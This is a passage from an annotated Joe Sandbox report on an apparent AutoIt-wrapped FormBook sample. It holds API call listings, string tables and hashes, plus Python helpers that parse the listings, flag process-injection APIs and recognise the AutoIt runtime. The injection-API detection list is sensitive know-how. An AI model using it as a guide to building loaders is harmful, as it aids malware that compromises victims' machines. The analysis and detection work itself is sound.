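    print("picture-from-file routine at", [hex(h) for h in hits] if hits else "not found")
```

The matcher deliberately requires order but not adjacency, because the report interleaves housekeeping calls (GlobalLock, CloseHandle) between the interesting ones; a contiguous match would miss the routine. Subcall bullets are parsed but excluded from matching, since the report attributes them to a callee, not to the function whose listing they appear in.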
APIs
• SetTextColor.GDI32(?,00000000), ref: 0044D2DB
• GetSysColorBrush.USER32(0000000F), ref: 0044D30C
• GetSysColor.USER32(0000000F), ref: 0044D318
• SetBkColor.GDI32(?,000000FF), ref: 0044D332
• SelectObject.GDI32(?,00000000), ref: 0044D341
• InflateRect.USER32(?,000000FF,000000FF), ref: 0044D36C
• GetSysColor.USER32(00000010), ref: 0044D374
• CreateSolidBrush.GDI32(00000000), ref: 0044D37B
• FrameRect.USER32(?,?,00000000), ref: 0044D38A
• DeleteObject.GDI32(00000000), ref: 0044D391
• InflateRect.USER32(?,000000FE,000000FE), ref: 0044D3DC
• FillRect.USER32(?,?,00000000), ref: 0044D40E
• GetWindowLongW.USER32(?,000000F0), ref: 0044D439
  • Part of subcall function 0044D575: GetSysColor.USER32(00000012), ref: 0044D5AE
  • Part of subcall function 0044D575: SetTextColor.GDI32(?,?), ref: 0044D5B2
  • Part of subcall function 0044D575: GetSysColorBrush.USER32(0000000F), ref: 0044D5C8
  • Part of subcall function 0044D575: GetSysColor.USER32(0000000F), ref: 0044D5D3
  • Part of subcall function 0044D575: GetSysColor.USER32(00000011), ref: 0044D5F0
  • Part of subcall function 0044D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0044D5FE
  • Part of subcall function 0044D575: SelectObject.GDI32(?,00000000), ref: 0044D60F
  • Part of subcall function 0044D575: SetBkColor.GDI32(?,00000000), ref: 0044D618
  • Part of subcall function 0044D575: SelectObject.GDI32(?,?), ref: 0044D625
                                                                                                                • Part of subcall function 0044D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0044D644
                                                                                                                • Part of subcall function 0044D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0044D65B
                                                                                                                • Part of subcall function 0044D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0044D670
                                                                                                                • Part of subcall function 0044D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0044D698
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                              • String ID:
                                                                                                              • API String ID: 3521893082-0
                                                                                                              • Opcode ID: db8b5b5e5468d3bb3e3a2e724de2aac793aea1bc3a47e390ad6891cf5b56e88b
                                                                                                              • Instruction ID: f537bfa0447830d1f3974ed259393e852b27c260fb8945b61014efbd137d00c1
                                                                                                              • Opcode Fuzzy Hash: db8b5b5e5468d3bb3e3a2e724de2aac793aea1bc3a47e390ad6891cf5b56e88b
                                                                                                              • Instruction Fuzzy Hash: A9919F71D08301BFD7109F64DC08A6BBBA9FF89325F100A29F962961E0E7B5D944CB57
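The two blocks above are typical of how this section is laid out: each "APIs" entry is either a direct call with its argument list and call-site address, a call with no argument list (DestroyWindow.USER32 ref: 003FB98B), or a call attributed to a subcall ("Part of subcall function 0044D575: ..."). When comparing many such blocks it is faster to parse them than to read them. The parser below is an added example, not code from the report or from Joe Sandbox; it is fed lines copied from the blocks above (plus one constructed WriteProcessMemory line, with a placeholder address, to show what a flagged entry looks like) and returns per-module counts, the subcall attribution, and whether any of the process-injection primitives appear. For both GUI blocks that last list is empty, which is the point: these functions are drawing and teardown code, not the loader.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple

# One "APIs" entry of a Joe Sandbox function block. The three shapes seen in the
# report are:
#   • SetTextColor.GDI32(?,00000000), ref: 0044D2DB
#   • DestroyWindow.USER32 ref: 003FB98B                      (no argument list)
#   • Part of subcall function 0044D575: GetSysColor.USER32(00000012), ref: 0044D5AE
API_LINE = re.compile(
    r"^(?:•\s*)?"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_\-]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# APIs that implement the process-injection primitives a loader needs. Their absence
# from a block is as informative as their presence when deciding what a function does.
INJECTION_APIS = frozenset({
    "VirtualAllocEx", "NtAllocateVirtualMemory", "WriteProcessMemory", "NtWriteVirtualMemory",
    "NtMapViewOfSection", "NtUnmapViewOfSection", "SetThreadContext", "NtSetContextThread",
    "QueueUserAPC", "NtQueueApcThread", "CreateRemoteThread", "NtCreateThreadEx", "NtResumeThread",
})


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: int                    # address of the call site
    subcall_of: Optional[int]   # callee address when the entry is attributed to a subcall


def parse_api_lines(lines: Iterable[str]) -> List[ApiCall]:
    """Return every API entry in a pasted block; headers, hashes and dump sources are skipped."""
    calls: List[ApiCall] = []
    for raw in lines:
        m = API_LINE.match(raw.strip())
        if not m:
            continue
        args_txt = m.group("args")
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("module").upper(),
            args=tuple(args_txt.split(",")) if args_txt else (),
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def summarize(calls: List[ApiCall]) -> Dict[str, object]:
    """Per-module counts plus how many entries Joe Sandbox attributed to subcalls."""
    return {
        "total": len(calls),
        "direct": sum(1 for c in calls if c.subcall_of is None),
        "via_subcall": sum(1 for c in calls if c.subcall_of is not None),
        "modules": dict(Counter(c.module for c in calls)),
        "apis": sorted({c.api for c in calls}),
    }


def flag_injection_calls(calls: List[ApiCall]) -> List[ApiCall]:
    """Entries whose API is one of the injection primitives above."""
    return [c for c in calls if c.api in INJECTION_APIS]


# Constructed sample: lines copied from the two GUI blocks above, with the surrounding
# headers left in to show that they are ignored by the parser.
SAMPLE_BLOCK = [
    "APIs",
    "• SetTextColor.GDI32(?,00000000), ref: 0044D2DB",
    "• GetSysColorBrush.USER32(0000000F), ref: 0044D30C",
    "• InflateRect.USER32(?,000000FF,000000FF), ref: 0044D36C",
    "• FrameRect.USER32(?,?,00000000), ref: 0044D38A",
    "• GetWindowLongW.USER32(?,000000F0), ref: 0044D439",
    "  • Part of subcall function 0044D575: GetSysColor.USER32(00000012), ref: 0044D5AE",
    "  • Part of subcall function 0044D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0044D5FE",
    "• DestroyWindow.USER32 ref: 003FB98B",
    "• ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0045D2E3",
    "Memory Dump Source",
    "• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true",
]

# Constructed line (not from the report) showing what a flagged entry looks like;
# the call-site address is a placeholder.
CONSTRUCTED_INJECTION_LINE = "• WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: DEADBEEF"

if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_BLOCK)
    print(summarize(calls))
    print(flag_injection_calls(calls))                                   # [] for the GUI block
    print(flag_injection_calls(parse_api_lines([CONSTRUCTED_INJECTION_LINE])))
```

The regex keeps the subcall attribution separate because Joe Sandbox repeats a callee's API list under every caller (the 0044D575 entries above reappear in the block that is 0044D575 itself); counting them as direct calls inflates the caller's apparent capability.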
                                                                                                              APIs
                                                                                                              • DestroyWindow.USER32 ref: 003FB98B
                                                                                                              • DeleteObject.GDI32(00000000), ref: 003FB9CD
                                                                                                              • DeleteObject.GDI32(00000000), ref: 003FB9D8
                                                                                                              • DestroyIcon.USER32(00000000), ref: 003FB9E3
                                                                                                              • DestroyWindow.USER32(00000000), ref: 003FB9EE
                                                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045D2AA
                                                                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0045D2E3
                                                                                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0045D711
                                                                                                                • Part of subcall function 003FB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,003FB759,?,00000000,?,?,?,?,003FB72B,00000000,?), ref: 003FBA58
                                                                                                              • SendMessageW.USER32 ref: 0045D758
                                                                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0045D76F
                                                                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 0045D785
                                                                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 0045D790
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 464785882-4108050209
                                                                                                              • Opcode ID: 7c80487bb438f9bd67a3f22bfac26aa477efc003894b0c1b4bc7f408bbfed3a9
                                                                                                              • Instruction ID: 8be819459a5c51d67de8bf57f5c8df279c8126dde6453bf378326b457ec5142d
                                                                                                              • Opcode Fuzzy Hash: 7c80487bb438f9bd67a3f22bfac26aa477efc003894b0c1b4bc7f408bbfed3a9
                                                                                                              • Instruction Fuzzy Hash: E112B170A04205EFDB21CF14C984BBAB7E4FF09306F14456AEA89CB652C775EC4ACB56
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0042DBD6
                                                                                                              • GetDriveTypeW.KERNEL32(?,0047DC54,?,\\.\,0047DC00), ref: 0042DCC3
                                                                                                              • SetErrorMode.KERNEL32(00000000,0047DC54,?,\\.\,0047DC00), ref: 0042DE29
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode$DriveType
                                                                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                              • API String ID: 2907320926-4222207086
                                                                                                              • Opcode ID: 1be02657b3cf8e4dbd4506bf4e17538a69700fc9e01e8951d8408da9f455649a
                                                                                                              • Instruction ID: 7c4694a997065cd8d0988c1eba4808677aae2e847e7cf3b099b11e8118758c05
                                                                                                              • Opcode Fuzzy Hash: 1be02657b3cf8e4dbd4506bf4e17538a69700fc9e01e8951d8408da9f455649a
                                                                                                              • Instruction Fuzzy Hash: E7510C30B1CB219F8714DF11E84192AB7A1FB55706BA0452BF0079B2E2CBA8ED46C74F
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __wcsnicmp
                                                                                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                              • API String ID: 1038674560-86951937
                                                                                                              • Opcode ID: dbd8af81c3794326c7b877b29cea8ef6413961950f62f185815693531d3a34e0
                                                                                                              • Instruction ID: 603f39ace1b500c333e50fc677a6246897646c7a58a357404bc83bbf571ba38b
                                                                                                              • Opcode Fuzzy Hash: dbd8af81c3794326c7b877b29cea8ef6413961950f62f185815693531d3a34e0
                                                                                                              • Instruction Fuzzy Hash: 3C815931640265BBCB22BA66DD43FBF3768AF15301F14413BFD067A1C2E7A5DA06C298
                                                                                                              APIs
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0044C788
                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0044C83E
                                                                                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 0044C859
                                                                                                              • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044CB15
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 2326795674-4108050209
                                                                                                              • Opcode ID: 8171432dc333ed3d7aa17914bf8f5b6a88c7ab7f4de1a3b8833b8f1ab66a4896
                                                                                                              • Instruction ID: 6d3fc05277dc560dbbb0432239b7df9a6d8815152c837a8a72f56e960bb0d441
                                                                                                              • Opcode Fuzzy Hash: 8171432dc333ed3d7aa17914bf8f5b6a88c7ab7f4de1a3b8833b8f1ab66a4896
                                                                                                              • Instruction Fuzzy Hash: D3F1CF70606341ABF7618F24C8C5BABBBE4FF49354F0C052AF589D62A1D778D841CB9A
                                                                                                              APIs
                                                                                                              • CharUpperBuffW.USER32(?,?,0047DC00), ref: 00446449
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BuffCharUpper
                                                                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                              • API String ID: 3964851224-45149045
                                                                                                              • Opcode ID: 0d7b4fbbe64c1c6f41e115b0b6325972f4eee9fc7a6ac497b2e5a7e9a8393f00
                                                                                                              • Instruction ID: 19ef0dca68471412f01efd045cb451639a13e132b15aab2a8c111d6f8283d55f
                                                                                                              • Opcode Fuzzy Hash: 0d7b4fbbe64c1c6f41e115b0b6325972f4eee9fc7a6ac497b2e5a7e9a8393f00
                                                                                                              • Instruction Fuzzy Hash: D5C1A4342042458BDB05EF10C551AAF7795AF96348F01486EF9855B3E2DB38ED4BCB8B
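Three of the blocks above carry string tables that pin down what this image is: the GetDriveTypeW block with the drive and bus-type names ("Fixed", "CDROM", "RAMDisk", "1394", "ATAPI", "iSCSI", ...) that AutoIt's DriveGetType returns, the __wcsnicmp block with the AutoIt script directives (#include-once, #notrayicon, #requireadmin, #pragma compile, #OnAutoItStartRegister) and their parser errors, and the CharUpperBuffW block with the ControlCommand keywords (ADDSTRING, ISCHECKED, SHOWDROPDOWN, TABLEFT, ...). All three are part of the AutoIt3 interpreter stub, not of the script it wraps. The check below is an added example, not code from the report or from Joe Sandbox: it scans a buffer (a process dump or the PE itself) for those tables in both ASCII and UTF-16LE, which is how the interpreter stores them, and only calls the image an AutoIt runtime when several of the distinctive directives are present alongside the generic words. The sample buffers are constructed inline; the marker lists are copied from the String ID lines of the three blocks, with the very short entries ("#cs", "#ce", "USB", "SSD", "CHECK") left out because they match too easily.

```python
from typing import Dict, List, Tuple

# Marker strings copied from the report's "String ID" lines. Short or substring-prone
# entries are omitted on purpose so a hit means the whole token was present.
AUTOIT_DIRECTIVES = [
    "#OnAutoItStartRegister", "#comments-end", "#comments-start", "#include-once",
    "#notrayicon", "#pragma compile", "#requireadmin",
    "Bad directive syntax error", "Cannot parse #include", "Unterminated group of comments",
]
CONTROL_COMMANDS = [
    "ADDSTRING", "CURRENTTAB", "DELSTRING", "EDITPASTE", "FINDSTRING", "GETCURRENTCOL",
    "GETCURRENTLINE", "GETCURRENTSELECTION", "GETLINECOUNT", "GETSELECTED", "HIDEDROPDOWN",
    "ISCHECKED", "ISENABLED", "ISVISIBLE", "SELECTSTRING", "SENDCOMMANDID",
    "SETCURRENTSELECTION", "SHOWDROPDOWN", "TABLEFT", "TABRIGHT",
]
DRIVE_TYPES = [
    "FileBackedVirtual", "PhysicalDrive", "RAMDisk", "Removable", "iSCSI", "ATAPI",
    "Fibre", "Network", "Virtual", "Unknown", "Fixed", "CDROM",
]
MARKER_SETS = {
    "directives": AUTOIT_DIRECTIVES,
    "control_commands": CONTROL_COMMANDS,
    "drive_types": DRIVE_TYPES,
}


def find_markers(data: bytes, markers: List[str]) -> Dict[str, List[Tuple[str, int]]]:
    """Offsets of every marker, searched as ASCII and as UTF-16LE (AutoIt keeps wide strings)."""
    hits: Dict[str, List[Tuple[str, int]]] = {}
    for text in markers:
        for enc in ("ascii", "utf-16-le"):
            needle = text.encode(enc)
            pos = data.find(needle)
            while pos != -1:
                hits.setdefault(text, []).append((enc, pos))
                pos = data.find(needle, pos + 1)
    return hits


def score_autoit_runtime(data: bytes) -> Dict[str, object]:
    """Count distinct markers per table and decide whether the image is the AutoIt3 stub."""
    counts = {name: len(find_markers(data, markers)) for name, markers in MARKER_SETS.items()}
    # The directives are the distinctive part; drive names and GUI verbs alone appear in
    # plenty of unrelated software, so they only corroborate.
    verdict = counts["directives"] >= 3 and (counts["control_commands"] + counts["drive_types"]) >= 5
    return {"counts": counts, "is_autoit_runtime": verdict}


def build_image(items: List[str], encoding: str) -> bytes:
    """Constructed stand-in for a dump: the given strings separated by zero padding."""
    pad = b"\x00" * 8
    return pad + pad.join(s.encode(encoding) for s in items) + pad


# Constructed positive: a handful of markers from each table, stored wide as the
# interpreter does. Constructed negative: a DOS-stub-like buffer that happens to
# contain two of the generic drive words as ASCII.
SAMPLE_AUTOIT_IMAGE = build_image(
    ["#include-once", "#notrayicon", "#requireadmin", "#pragma compile",
     "ISCHECKED", "SHOWDROPDOWN", "TABLEFT", "SENDCOMMANDID", "GETCURRENTSELECTION",
     "RAMDisk", "Removable", "iSCSI"],
    "utf-16-le",
)
SAMPLE_OTHER_IMAGE = b"MZ\x90\x00" + b"This program cannot be run in DOS mode" + b"\x00Fixed\x00Network\x00"

if __name__ == "__main__":
    print(score_autoit_runtime(SAMPLE_AUTOIT_IMAGE))   # is_autoit_runtime: True
    print(score_autoit_runtime(SAMPLE_OTHER_IMAGE))    # is_autoit_runtime: False
```

A positive verdict identifies the wrapper family only. The script this stub executes, and the FormBook code that ends up in the injected process, contain none of these tables, so the functions listed in this part of the report should be set aside when deciding what the payload itself does.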
                                                                                                              APIs
                                                                                                              • GetSysColor.USER32(00000012), ref: 0044D5AE
                                                                                                              • SetTextColor.GDI32(?,?), ref: 0044D5B2
                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0044D5C8
                                                                                                              • GetSysColor.USER32(0000000F), ref: 0044D5D3
                                                                                                              • CreateSolidBrush.GDI32(?), ref: 0044D5D8
                                                                                                              • GetSysColor.USER32(00000011), ref: 0044D5F0
                                                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0044D5FE
                                                                                                              • SelectObject.GDI32(?,00000000), ref: 0044D60F
                                                                                                              • SetBkColor.GDI32(?,00000000), ref: 0044D618
                                                                                                              • SelectObject.GDI32(?,?), ref: 0044D625
                                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0044D644
                                                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0044D65B
                                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0044D670
                                                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0044D698
                                                                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0044D6BF
                                                                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 0044D6DD
                                                                                                              • DrawFocusRect.USER32(?,?), ref: 0044D6E8
                                                                                                              • GetSysColor.USER32(00000011), ref: 0044D6F6
                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0044D6FE
                                                                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0044D712
                                                                                                              • SelectObject.GDI32(?,0044D2A5), ref: 0044D729
                                                                                                              • DeleteObject.GDI32(?), ref: 0044D734
                                                                                                              • SelectObject.GDI32(?,?), ref: 0044D73A
                                                                                                              • DeleteObject.GDI32(?), ref: 0044D73F
                                                                                                              • SetTextColor.GDI32(?,?), ref: 0044D745
                                                                                                              • SetBkColor.GDI32(?,?), ref: 0044D74F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                              • String ID:
                                                                                                              • API String ID: 1996641542-0
                                                                                                              • Opcode ID: dc6ce94171eb419b7efa06880ba7ef30e0a9b8994e73c59c369fc9143c151029
                                                                                                              • Instruction ID: c4d7c50c98e8e087ded7a413fd7711fdaad2173f571f5fb10c8860bc6065f50a
                                                                                                              • Opcode Fuzzy Hash: dc6ce94171eb419b7efa06880ba7ef30e0a9b8994e73c59c369fc9143c151029
                                                                                                              • Instruction Fuzzy Hash: 6F514A71E00218BFDF109FA8DC48AEE7B79EF09324F114125FA15AB2A1E7B59A40CB55
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0044B7B0
                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0044B7C1
                                                                                                              • CharNextW.USER32(0000014E), ref: 0044B7F0
                                                                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0044B831
                                                                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0044B847
                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0044B858
                                                                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0044B875
                                                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 0044B8C7
                                                                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0044B8DD
                                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 0044B90E
                                                                                                              • _memset.LIBCMT ref: 0044B933
                                                                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0044B97C
                                                                                                              • _memset.LIBCMT ref: 0044B9DB
                                                                                                              • SendMessageW.USER32 ref: 0044BA05
                                                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 0044BA5D
                                                                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 0044BB0A
                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0044BB2C
                                                                                                              • GetMenuItemInfoW.USER32(?), ref: 0044BB76
                                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0044BBA3
                                                                                                              • DrawMenuBar.USER32(?), ref: 0044BBB2
                                                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 0044BBDA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 1073566785-4108050209
                                                                                                              • Opcode ID: b08d1e1f9d37da3684547efbe185ae2ebc55ee38c1b47e51f4a16b81f39fdb63
                                                                                                              • Instruction ID: 89334d523f7002ad3ee09c7441b4d81fe2ffd8d5167016ad45206fef4232bda6
                                                                                                              • Opcode Fuzzy Hash: b08d1e1f9d37da3684547efbe185ae2ebc55ee38c1b47e51f4a16b81f39fdb63
                                                                                                              • Instruction Fuzzy Hash: EFE19071900218ABEB20DF65CC84AEE7B78FF05714F10816BF915AA290D778D941DFA9
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
